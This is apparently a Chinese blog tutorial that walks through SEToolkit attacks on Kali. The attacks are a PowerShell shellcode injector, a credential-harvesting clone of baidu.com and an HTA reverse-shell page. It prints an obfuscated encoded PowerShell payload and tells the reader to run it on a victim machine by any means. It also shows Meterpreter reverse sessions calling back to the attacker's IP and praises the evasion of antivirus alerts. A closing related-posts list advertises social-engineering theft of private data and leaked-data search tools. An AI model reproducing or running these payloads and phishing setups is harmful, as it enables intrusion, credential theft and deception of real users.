社会工程学(Social Engineering)简称社工,其通过分析攻击对象的心理弱点,利用人性的本能反应,以及任何好奇心,贪婪等心理特征进行的,使用诸如假冒,欺骗,引诱等多种手段来达成攻击目标的一种手段,社会工程学的应用领域非常之广泛,而很多黑客也会将社工运用到渗透的方方面面,社工也被称为没有技术,却比技术更强大的渗透方式,正所谓 “攻城为下,攻心为上” 这句话用在社工上面是最恰当不过的啦。

接下来将介绍一个工具,社会工程工具包(SEToolkit)工具,该工具由 David Kennedy (ReL1K)设计并开发,并且有一群活跃的社区合作进行维护工作(www.social-engineer.org),该工具包是开源的并使用Python作为开发语言,其主要目的是协助黑客更好的进行社工活动。

PowerShell 注入攻击

社工工具包中包含一个PowerShell注入攻击的有效载荷,适用于 Win7 - Win10系统使用,因为PowerShell脚本可以很容易的将ShellCode注入到目标的物理内存中,使用该载荷攻击不会触发病毒报警。

1.Kali系统中默认安装了SEToolkit工具,我们只需要运行该工具,然后从主菜单选择 1) Social-Engineering。

root@kali:~#  setoolkit

 Select from the menu:
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit set> 1

2.然后在选择下一级菜单中的 9) PowerShell Attack Vectors。

 Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) SMS Spoofing Attack Vector
11) Third Party Modules
99) Return back to the main menu. set> 9

3.接着我们选择第一个选项,Powershell Alphanumeric Shellcode Injector

   1) Powershell Alphanumeric Shellcode Injector
2) Powershell Reverse Shell
3) Powershell Bind Shell
4) Powershell Dump SAM Database
99) Return to Main Menu set:powershell> 1

4.首先设置好本机的IP地址,我这里是 192.168.1.40 然后等待生成PowerShell脚本,默认放在 /root/.set/reports/powershell/路径下,我们复制里面的内容。

Enter the IPAddress or DNS name for the reverse host: 192.168.1.40
set:powershell> Enter the port for the reverse [443]:
[*] Prepping the payload for delivery and injecting alphanumeric shellcode...
[*] Generating x86-based powershell injection code...
[*] Reverse_HTTPS takes a few seconds to calculate..One moment..
No encoder or badchars specified, outputting raw payload
Payload size: 380 bytes
Final size of c file: 1622 bytes [*] Finished generating powershell injection bypass.
[*] Encoded to bypass execution restriction policy...
[*] If you want the powershell commands and attack, they are exported to /root/.set/reports/powershell/
set> Do you want to start the listener now [yes/no]: : yes

5.通过各种途径,在被害主机上面执行这一段ShellCode代码。

powershell -w 1 -C "sv i -;sv pz ec;sv YD ((gv i).value.toString()+(gv pz).value.toString());powershell (gv YD).value.toString() 'JABOAHgAIAA9ACAAJwAkAEsAcwAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAa'"

6.回到Kali,会发现出现了一个会话,使用 sessions -i 查询,上线成功!

msf5 exploit(multi/handler) >
[*] Started HTTPS reverse handler on https://0.0.0.0:443
[*] https://0.0.0.0:443 handling request from 192.168.1.2; (UUID: skqutxoz) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 1 opened (192.168.1.40:443 -> 192.168.1.2:64014) at 2019-08-14 12:29:21 +0800 msf5 exploit(multi/handler) > sessions -i Active sessions
=============== Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows DESKTOP @ DESKTOP 192.168.1.40:443 -> 192.168.1.2:64014 (192.168.1.2) msf5 exploit(multi/handler) >

SEToolkit 站点克隆

  1. SEToolkit 还支持站点克隆首先选择,1)Social-Engineering Attacks
 Select from the menu:
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit set> 1

2.接着选择,2)Website Attack Vectors

 Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) SMS Spoofing Attack Vector
11) Third Party Modules
99) Return back to the main menu. set> 2
  1. 选择 3)Credential Harvester Attack Method
   1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method
8) HTA Attack Method
99) Return to Main Menu set:webattack>3

4.这里会有三个选项,第一个是使用系统自带的模板,第二个是克隆一个页面,第三个是自定义页面,此处选择2,并输入待克隆页面。

set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.1.40]:192.168.1.40
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:www.baidu.com [*] Cloning the website: http://www.baidu.com
[*] This could take a little bit... The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] You may need to copy /var/www/* into /var/www/html depending on where your directory structure is.
Press {return} if you understand what we're saying here.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
[*] Looks like the web_server can't bind to 80. Are you running Apache or NGINX?
Do you want to attempt to disable Apache? [y/n]: y
[ ok ] Stopping apache2 (via systemctl): apache2.service.
[ ok ] Stopping nginx (via systemctl): nginx.service.
[*] Successfully stopped Apache. Starting the credential harvester.
[*] Harvester is ready, have victim browse to your site.

SEToolkit HTA 注入攻击

HTA shell注入攻击,生成一个克隆页面,当用户点击运行脚本的时候,会触发反弹一个Shell。

1.根据上方的步骤,重新运行SEToolkit工具然后选择,1)Social-Engineering Attacks

 Select from the menu:
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit set> 1

2.选择 2)Website Attack Vectors

 Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) SMS Spoofing Attack Vector
11) Third Party Modules
99) Return back to the main menu. set> 2

3.选择 8)HTA Attack Method

   1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method
8) HTA Attack Method
99) Return to Main Menu set:webattack>8

4.选择 2)Site Cloner,克隆一个站点,然后选择一个攻击载荷,Meterpreter Reverse TCP

   1) Web Templates
2) Site Cloner
3) Custom Import 99) Return to Webattack Menu set:webattack>2
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:www.baidu.com
[*] HTA Attack Vector selected. Enter your IP, Port, and Payload...
set> IP address or URL (www.ex.com) for the payload listener (LHOST) [192.168.1.40]:
Enter the port for the reverse payload [443]:
Select the payload you want to deliver: 1. Meterpreter Reverse HTTPS
2. Meterpreter Reverse HTTP
3. Meterpreter Reverse TCP Enter the payload number [1-3]: 3

5.用户点击页面,运行脚本以后,成功反弹Shell。

社工工具包 SEToolkit的更多相关文章

  1. 我是如何社工TDbank获取朋友隐私的

    原创 ziwen@beebeeto 转载请保留本行 个人感觉 国外的安全方面对社工的了解和防范并不是很好 即使他们使用社工的时间比我们要长很多 比如 他们的visa在pos机上使用是不需要密码的 而且 ...

  2. python 模拟ajax查询社工库...

    在windows中使用,输入有关信息查询社工库,本来是网页版的,我把ajax请求提取出来.粗略的封装下,挺好玩. #coding:utf8 import urllib2,urllib from Bea ...

  3. 社工数据搜索引擎搭建 - Build Social Engineer Evildata Search Engine

    如何设计搭建一个社工库 从初起设计一个社工库,到现在的Beta,前前后后零零整整花了不下一个月的时间,林林总总记录下来,留给需要之人 泄露数据库格式不一,长相奇葩,因需将用户名.密码.邮箱.哈希等信息 ...

  4. 常见社工破解WPA2密码方法及防范措施

    0×00前言 何为社工?社工是一种通过利用受害者心理弱点,如本能反应.好奇心.同情心.信任.贪婪等进行诸如欺骗.盗取.控制等非法手段的一种攻击方式.在无线安全中也可以利用社工做到许多非法操作.下面举几 ...

  5. bugku 社工进阶

    首先看到的是 由于之前知道有bugku的百度吧   并且这个是一个社工题所以可以试一下这个百度吧 进入百度吧然后会见到 这句话的意思是要我们登录这个账号 但是我们只有账号没有密码  如果爆破的话很有可 ...

  6. Bugku-CTF社工篇之简单的社工尝试

  7. Bugku-CTF社工篇之王晓明的日记

  8. Bugku-CTF社工篇之社工进阶

     

  9. Bugku-CTF社工篇之简单的个人信息收集

随机推荐

  1. IPC远程入侵

    https://mp.weixin.qq.com/s/rQxvp2Sq8E4pBn-E9-COww IPC远程入侵 黑客网络技术 4月19日 一.什么是IPC 进程间通信(IPC,Inter-Proc ...

  2. C# mongodb 类库

    https://github.com/mongodb/mongo-csharp-driver/downloads https://github.com/mongodb/mongo-csharp-dri ...

  3. Onvif协议及其在Android下的实现

    好久没有写博客,今天将前段时间做的Onvif协议在Android上的实现分享给大家. 首先,我们先来了解一下什么是Onvif协议:ONVIF 协议是由Open Network Video Interf ...

  4. 使用rsync备份数据

    (1).实验环境与目标 源主机:youxi1 192.168.5.101 目标主机:youxi2 192.168.5.102 目标:将源主机youxi1的数据备份到youxi2上. rsync是C/S ...

  5. ps填充颜色快捷键

    一:选中区域: 二:填充前景色快捷键是“Alt+Delete”: 三:填充背景色的键盘快捷键是“Ctrl+Delete”:

  6. IEnumerable和IQueryable口的区别

    IQueryable: 动态表达式树拼接查询语句,把拼接后查询语句进行执行:Execute触发,延迟加载IEnumerable:对内存中的数据,动态拼接查询语句,进行查询:ToList触发,延迟加载: ...

  7. 【leetcode】506. Relative Ranks

    problem 506. Relative Ranks solution1:使用优先队列: 掌握priority_queue 和 pair的使用: class Solution { public: v ...

  8. Scrapy框架学习参考资料

    00.Python网络爬虫第三弹<爬取get请求的页面数据> 01.jupyter环境安装 02.Python网络爬虫第二弹<http和https协议> 03.Python网络 ...

  9. ubuntu16.04 下通过rc.d(rc.local)实现开机启动(未登录)anydesk

    先编辑anydesk-X.X.X/init/anydesk文件,将"DAEMON=//usr/bin$NAME"改成"DAEMON=/XXX/anydesk-5.1.1/ ...

  10. ps命令入门使用指南

    声明:本文算不上原创,主要是参考和整理了该博客ps命令详解 Shell 命令: ps [options] [--help] ps 常用参数: l 长格式输出: u 按用户名和启动时间的顺序来显示进程: ...